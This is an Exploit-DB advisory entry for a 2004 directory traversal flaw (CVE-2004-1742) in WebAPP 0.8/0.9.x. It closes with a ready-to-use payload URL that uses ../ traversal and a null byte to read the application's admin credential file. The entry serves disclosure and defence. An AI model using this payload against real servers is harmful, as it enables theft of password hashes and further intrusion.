Web-APP.Org WebAPP 0.8/0.9.x - Directory Traversal Vulnerability

2004-08-24T00:00:00
ID EDB-ID:24408
Type exploitdb
Reporter Jerome Athias
Modified 2004-08-24T00:00:00

Description

Web-APP.Org WebAPP 0.8/0.9.x Directory Traversal Vulnerability. CVE-2004-1742. Webapps exploit for cgi platform

                                        
                                            source: http://www.securityfocus.com/bid/11028/info

WebAPP is reported prone to a directory-traversal vulnerability because the application fails to properly sanitize user-supplied input data.

An attacker can exploit this vulnerability to retrieve arbitrary, potentially sensitive files from the hosting computer with the privileges of the webserver. gthe attacker could trivially retrieve DES-encrypted password hashes for all users of the application. This may aid the attacker in further attacks. 

http://www.example.com/cgi-bin/index.cgi?action=topics&viewcat=../../db/members/admin.dat%00